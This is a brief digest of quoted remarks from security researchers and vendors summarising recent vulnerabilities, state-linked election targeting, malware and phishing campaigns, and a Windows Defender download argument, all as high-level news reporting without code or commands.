The researcher Steven Seeley: It’s due to improper validation of cmdlet arguments. Exploitation requires an authenticated user in a certain role. Patches have been released.
Microsoft cyber security experts: Foreign activity stepped up targeting the 2020 vote. It’s the work of well known actors as Strontium, Zirconium and Phosphorus.
Zscaler cyber security experts: The malware simulates a faulty software, but meanwhile hides in the device and start working. It’s brain is the “MainService”.
The cyber security expert JAMESWT: The malware infection chain is activated if the victim enable Macros of an attachment related to a fake request by a real company.
Atlas VPN cyber security experts: The country in the last 31 days suffered 2.1 million aggressions. Part are for cyber espionage purpose, other for cybercrime.
Palo Alto Networks cyber security experts: The malware was configured to overwrite the master boot record (MBR), and contains network-spreading functionality.
Cybereason cyber security experts: The malware, written in Python, has different functionalities. The chain of infection and the infrastructure are also changed.
Cofense cyber security experts: A mail alerts the victim on three messages at risk and asks to click a link. This leads to a real company’s page with a fake login panel.
Mohammad Askar: A recent update includes a new - DownloadFile command-line argument. Bleeping Computer: It allows local users to use MpCmdRun.exe to download files from a remote location.
Proofpoint cyber security experts: The malware has been distributed in 2 different campaigns Covid-19 themed. One targeted many organisations in EU. The other, against Tibetan dissidents.